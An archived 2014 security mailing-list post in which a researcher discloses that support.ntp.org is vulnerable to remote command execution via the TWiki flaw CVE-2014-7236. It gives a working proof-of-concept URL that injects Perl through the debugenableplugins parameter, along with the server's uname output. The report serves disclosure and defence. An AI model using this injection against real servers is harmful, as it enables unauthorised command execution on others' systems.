[ntp:security] [BITCOMSEC] Remote Command Execution on support.ntp.org (re: CVE-2014-7236)

Bitcoin Community Security Project bitcomsecresearch at gmail.com
Fri Oct 10 19:37:22 UTC 2014


Security,

My name is Mike and I am with the BITCOMSEC (bitcoin community security)
project - we usually report vulnerabilities in Bitcoin related exchanges,
pools and merchant sites. Occasionally we find security issues like this
one grave enough to report so that it helps the greater internet community
with a safer secure environment.

As of right now support.ntp.org is vulnerable to Remote Command Execution
via TWiki's recent CVE-2014-7236 (
http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236). TWiki
allows for the execution of Perl code within the 'debugenableplugins'
variable/feature. An unsafe eval and bad sanitizing allows for an attacker
to run commands on your server as webserver user.

PoC:

http://support.ntp.org/bin/view/Servers/WebRss?debugenableplugins=SmiliesPlugin%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable
!"%29%3bexit

uname:


FreeBSD psp2.ntp.org 7.2-STABLE FreeBSD 7.2-STABLE #5: Sun Nov 15 13:23:37
PST 2009 root at psp2.ntp.org:/usr/obj/usr/src/sys/GENERIC amd64

I am hoping that this issue be resolved immediately before it is used by
arbitrary third parties to execute commands on the NTP infrastructure.

If you have any questions we are here to help. Look on my signature to
learn more about us, or if you'd like to donate to our cause or shout us
out on twitter! Thanks and hope you fix the issue immedialy.

regards,
Mike



-- 
[bitcomsec]
founder und lead security researcher
reddit: https://reddit.com/r/bitcoinsec
twitter: https://twitter.com/bitcomsec
about:
http://blog.bitcomsec.org/post/72193060412/an-introduction-to-bitcomsec
BTC: 1SEC1BS5wFDSToi1v3RubV9PjCSSPa6s9

-----BEGIN PGP PUBLIC KEY BLOCK-----

xo0EUrsmqQED/2uxmE6D/HG057/OTy3Pdxlip5F92byq3/v1TN9HUcI9fEPt
vKj1c6QNYIAJAW4vBKobvQnTVig1z8G1cwJo8dJz5irCnXbVbNif3saE32qE
ImJC7B8EaWAxCnpxiWyjcg2aiA0mJBDLC2e0a67BRnb4i0oYJ0IYLkIfmW1g
8YmXABEBAAHNMmJpdGNvbXNlYyByZXNlYXJjaGVyIDxiaXRjb21zZWNyZXNl
YXJjaEBnbWFpbC5jb20+wpwEEAEIABAFAlK7JsMJEOw5JoZLxtEcAADKSQP/
QNsiAjmj08qSpC1Dym20OjraZLI1n35A3EYTmaB1pOShPb0iUwkn2uQ9q1nU
d0IBHK46tK8k2/mXwFzOOou474lvKY3O1mw+rzmKo1v+MeJJbBces0p1Sy3o
pwK3jf6zAVbxlEdchcsGj4CnE7qwDAbTpXMsrdxaZu5LwCrV3ZM=
=/OA9
-----END PGP PUBLIC KEY BLOCK-----
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.ntp.org/private/security/attachments/20141010/2d03c4ae/attachment.html>


More information about the security mailing list